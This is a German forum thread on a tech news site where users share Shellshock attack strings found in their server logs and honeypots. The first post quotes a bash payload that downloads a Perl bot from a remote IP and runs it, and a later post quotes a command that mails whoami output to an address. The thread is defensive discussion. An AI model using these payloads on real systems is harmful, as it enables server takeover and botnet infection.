1. Foren
  2. Kommentare
  3. Security-Forum
  4. Alle Kommentare zum Artikel
  5. › Bash-Lücke: Server von Yahoo…

Hier so ein Perl Bot Script:

Neue Foren im Freiraum! Raumfahrt und freie Software haben jetzt einen Platz, die Games tummeln sich jetzt alle in einem Forum.
  1. Thema

Neues Thema


  1. Hier so ein Perl Bot Script:

    Autor: ein_user 06.10.14 - 20:39

    Falls jemand neugierig ist, ich hatte eine Anfrage mit folgendem User-Agent in in meinem Apache Log:

    () { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://89.33.193.10/ji ; lwp-download http://89.33.193.10/ji ; curl -O /var/tmp/ji http://89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\"

    Das laedt also das Skript runter von http://89.33.193.10/ji und fuehrt es dann aus :) Was das genau tut, koennt ihr euch jetzt ueberlegen :)

  2. Re: Hier so ein Perl Bot Script:

    Autor: Felix_Keyway 06.10.14 - 21:13

    Ich hoffe dein Server ist nicht drauf angesprungen?

    Ich bin Spezialist der NSA mit dem Spezialgebiet Backdoors in den Linux-Kernel einzuschleusen ;) .

  3. Re: Hier so ein Perl Bot Script:

    Autor: DASPRiD 06.10.14 - 22:20

    Hab den selben auch gerade entdeckt, die Lücke war aber zum Glück schon geschlossen :D

  4. Re: Hier so ein Perl Bot Script:

    Autor: Freddy1404 06.10.14 - 22:34

    Hier mal ein paar von mir:

    http://spielwiese.fpprogs.de/shellshock.txt (Kann leider mit dem Tablet kein C&P machen, warum auch immer :D)

  5. Re: Hier so ein Perl Bot Script:

    Autor: ein_user 07.10.14 - 00:01

    Ne, ich war zwar zu dem Zeitpunkt nicht gepatcht, aber ich hatte ja nur einen "blanken" Apache laufen, sogar ohne PHP.... Von daher: Keine Gefahr :)

  6. Re: Hier so ein Perl Bot Script:

    Autor: Freddy1404 07.10.14 - 00:02

    Sorry, doppelpost...

    Habe gerade mal nachgeschaut, letztes Update von bash am 25.9, also hatte ich die Lücke schon geschlossen... Puh! Denn wer sich den C-Code von dem einem Ding mal anschaut, dann ist das ein IRC-Bot, der sich mit dem Namen [crypto] tarnt; einen Prozess mit diesem Namen gibt es vielen Systemen.... Ebenso möchte er sich in die rc.local eintragen, was aber auf meinem System nicht funktioniert, da der Code hier nicht stimmt.

  7. Re: Hier so ein Perl Bot Script:

    Autor: angrydanielnerd 07.10.14 - 10:06

    Erst mal testen was geht:
    [28/Sep/2014:23:13:24 +0200] "GET / HTTP/1.1" 200 1749 "-" "() { :;}; /bin/bash -c \"whoami | mail -s 'domain.tld' xxx@gmail.com\"" (Domain und Mail abgeändert).

    Ob ich dem Menschen mal eine nette Mail schreiben soll? Der letzte, der in meinen Honeypot gelaufen ist und versucht hat sich eine Mail zu schicken, hat auch schon nicht geantwortet :(

    Dahinter noch einen Haufen Versuche verwundbare CGI Scripte unter cgi-bin, cgi-mod und cgi-sys zu finden und per wget irgendwas von http://creditstat.ru zu laden... leider ist der Link nicht mehr verfügbar.



    2 mal bearbeitet, zuletzt am 07.10.14 10:10 durch angrydanielnerd.

  8. Re: Hier so ein Perl Bot Script:

    Autor: Freddy1404 07.10.14 - 13:18

    Das ist ja cool! Spart man sich das Heraussuchen von der abuse-email... :-P Ich müsste hier doch noch irgendwo... *in den virtuellen Schubladen nach meinem selbst programmierten, Batch-Emailspammer mit den Zufallsabsenderadressen such*

    OT:
    Honeypots? Welche denn so? xD Hab gerade nur den portspoof laufen...

  9. Re: Hier so ein Perl Bot Script:

    Autor: angrydanielnerd 07.10.14 - 13:58

    Ob das so viel bringt ne GMail Adresse zu abusen, dann besorgt er sich eben ne andere. Egal, hab ich trotzdem mal ne nette Mail mit dem passenden Aufbau geschickt und eine nette Nachricht im zurückgelieferten Benutzernamen und der Domain verpackt :)

    Ich habe einen Kippo Honeypot auf einem kleinen VPS laufen, passiert leider nicht sooo viel da, aber WENN ist das immer ein Highlight was manche "Hacker" da versuchen.

  1. Thema

Neues Thema


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. SAP Application Engineer (m/w/d)
    VTG Aktiengesellschaft, Hamburg
  2. Senior IT Business Analyst (w/m/d) Treasury
    ING Deutschland, Frankfurt am Main
  3. Senior IT-Projektmanager (m/w/d)
    HiScout GmbH, Berlin
  4. Software Entwickler:in (m/w/d) PL/SQL / .NET/vue.js
    DKMS gemeinnützige GmbH, Tübingen

Detailsuche


Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Top-Angebote
  1. 119,90€ (Vergleichspreis 131,98€)
  2. 81,99€ (Bestpreis!)
  3. 67,99€ (Vergleichspreis 78,10€)
  4. (u. a. Intel Core i7 12700K für 359€ statt 382,88€ im Vergleich und MSI MAG Z790 Tomahawk WIFI...


Haben wir etwas übersehen?

E-Mail an news@golem.de